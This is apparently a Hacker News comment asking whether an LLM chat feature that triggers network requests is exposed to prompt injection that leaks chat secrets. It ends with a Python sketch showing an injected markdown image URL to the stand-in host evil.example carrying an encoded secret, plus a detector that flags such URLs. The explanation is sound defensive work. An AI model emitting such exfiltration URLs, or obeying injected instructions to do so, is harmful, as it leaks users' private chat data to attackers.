Hacker News

My assumption was that the reason this wasn't already implemented was security: via prompt injection, elements of the chat could be leaked by any feature that lets the LLM, even as a side effect, trigger a network request.

Much like the Slack issue of smuggling chat secrets out via query parameters.

Has that been considered at all here, or is it on the user to vet the model's suggestions?
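For illustration, here is a minimal sketch of the exfiltration pattern described above, using entirely hypothetical names (`evil.example`, `pixel.png`, the `d=` parameter): injected instructions get the model to emit a markdown image whose query string encodes chat secrets, so that merely rendering the output fires the leaking request. A crude mitigation is to flag any URL pointing at an unapproved host or carrying query data:

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Hypothetical secret present in the chat context.
SECRET = "api_key=sk-12345"

# Hypothetical injected model output: a markdown image whose query
# string smuggles chat content out to an attacker-controlled host.
payload = base64.urlsafe_b64encode(SECRET.encode()).decode()
model_output = f"Here is a chart: ![chart](https://evil.example/pixel.png?d={payload})"

def extract_urls(text: str) -> list[str]:
    """Pull URLs out of markdown image/link syntax."""
    return re.findall(r"\((https?://[^)\s]+)\)", text)

def flag_exfiltration(text: str, allowed_hosts: set[str]) -> list[str]:
    """Flag any URL on an unknown host, or any URL carrying query data."""
    flagged = []
    for url in extract_urls(text):
        parts = urlparse(url)
        if parts.netloc not in allowed_hosts or parse_qs(parts.query):
            flagged.append(url)
    return flagged

flagged = flag_exfiltration(model_output, allowed_hosts={"docs.example.com"})
```

This is only a sketch: real defenses tend to block rendering of untrusted URLs outright (or proxy them with the query string stripped), since regex-based filtering is easy to bypass.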
